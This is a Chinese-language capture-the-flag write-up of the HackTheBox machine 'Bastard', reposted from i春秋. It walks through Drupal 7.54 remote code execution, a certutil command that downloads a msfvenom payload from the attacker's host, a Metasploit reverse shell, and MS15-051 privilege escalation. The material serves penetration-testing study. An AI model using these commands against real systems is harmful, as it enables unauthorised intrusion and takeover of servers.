HTB靶场记录之Bastard

admin 2022年1月13日19:00:50安全文章评论14 views1647字阅读5分29秒阅读模式

HTB靶场记录之Bastard

HTB靶场记录之Bastard


本文是 i 春秋论坛作家「皮卡皮卡丘」表哥分享的技术文章,公众号旨在为大家提供更多的学习方法与技能技巧,文章仅供学习参考。

HTB靶场记录之Bastard

HTB是一个靶机平台,里面包含多种系统类型的靶机,并且很多靶机非常贴近实战情景,是一个学习渗透测试不错的靶场。


HTB靶场记录之Bastard


1、靶机介绍

这次的靶机是Bastard。


HTB靶场记录之Bastard


2、信息搜集

由于autorecon的速度比较慢,这里直接nmap -sC(默认脚本) -sS(快速扫描)过一下,80端口有个Drupal 7的标题,Drupal是个CMS具体的版本信息,可以查看/CHANGELOG.txt。


HTB靶场记录之Bastard


首先确保这个80端口能正常访问


HTB靶场记录之Bastard


其次我们跟进一下可以看到版本为7.54


HTB靶场记录之Bastard


3、搜索payload

我们肯定是用searchsploit查看漏洞版本信息,而版本为7.54最好使用Drupal 7.x Module Services -RemoteCode Execution。


HTB靶场记录之Bastard


在网上找了一个相关的Drupal的RCE漏洞的CVE编号,并且有很多不同的payload。


HTB靶场记录之Bastard


在GitHub上漏洞编号就可以,看了一下是python3的格式,并需要安装好以下的库才能顺利执行。


HTB靶场记录之Bastard


4、getshell进行中

此时直接一个python文件名-cwhoami成功执行。


HTB靶场记录之Bastard


或者是dir可列出当前目录下的文件名,并指导当前目录为C:inetpubdrupal-7.54。


HTB靶场记录之Bastard


目前的想法是创建一个新目录,然后我们生成恶意文件传上去一个运行接收shell回来(建议最好创建一个文件夹,用powershell的远程传文件python表示传输成功,但不知道把文件传到哪了)。


使用mkdir创建一个cunfang文件夹


HTB靶场记录之Bastard


关于传文件这里,在网上找了一一个CertUtil.exe的内置程序比较便捷。


格式为: 

certutil.exe -urlcache -split -f http://ip:端口/文件名


HTB靶场记录之Bastard


此时用msfVENOM生成一个.exe


HTB靶场记录之Bastard


用刚才的payload通过

certutil.exe-urlcache -split -f http://10.10.14.5:8080/makabaka.exe

把文件传上去(这里的ip是开了python共享模式的kali IP)


HTB靶场记录之Bastard


此时打开我们的MSF使用exploit/multi/handler经典模块,设置好kali的IP和端口顺便把payload设置为windows/x64/shell/reverse_tcp以后使用run开始监听。


HTB靶场记录之Bastard


此时用回payload远程执行,如上图所示直接接收shell成功。


HTB靶场记录之Bastard


这里拿到user的flag。


HTB靶场记录之Bastard


5、提权

这里提权我打算用MSF的自带提权payload。


HTB靶场记录之Bastard


用上面的方法添加多一个shell出来,出现meterpreter就是代表成功。


HTB靶场记录之Bastard


先使用background退出去,注意看session,然后使用

post/multi/recon/local_exploit_suggester模块,设置好session以后run。


HTB靶场记录之Bastard


根据systeminfo可知这是windows 2008 R2,可以使用大杀器MS15-051可针对Windows Server 2008 R2。


可以理解为49298大杀器通杀之前的靶机。


HTB靶场记录之Bastard


这里要到github上下载,然后用同样的方法certutil.exe传上去。


HTB靶场记录之Bastard


此时一波.exe whoami执行成功。


然而能变换最高权限只有在运行.exe +命令的情况下才行:


HTB靶场记录之Bastard


把shell.exe之前生成的恶意文件拿出来,再用MSF监听。


HTB靶场记录之Bastard


此时真正变为管理员能拿到root的flag。

HTB靶场记录之Bastard


以上为今天分享的内容,小伙伴们看懂了吗?


文章素材来源于i春秋社区


注:文章内容仅供学习交流使用,任何人不得将其用于非法用途,否则后果自行承担!


相关推荐






i春秋携手中通SRC开启众测挑战赛


Java自动化审计(上篇)


Java自动化审计(下篇)







HTB靶场记录之Bastard

培训认证


HTB靶场记录之Bastard


HTB靶场记录之Bastard

END



HTB靶场记录之Bastard

i春秋官方公众号为大家提供

前沿的网络安全技术

简单易懂的实用工具

紧张刺激的安全竞赛

还有网络安全大讲堂

更多技能等你来解锁

HTB靶场记录之Bastard


HTB靶场记录之Bastard

点分享

HTB靶场记录之Bastard

点点赞

HTB靶场记录之Bastard

点在看

原文始发于微信公众号(i春秋):HTB靶场记录之Bastard

特别标注: 本站(CN-SEC.COM)所有文章仅供技术研究,若将其信息做其他用途,由用户承担全部法律及连带责任,本站不承担任何法律及连带责任,请遵守中华人民共和国安全法.
  • 我的微信
  • 微信扫一扫
  • weinxin
  • 我的微信公众号
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年1月13日19:00:50
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                  HTB靶场记录之Bastard http://cn-sec.com/archives/735725.html

发表评论

匿名网友 填写信息

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: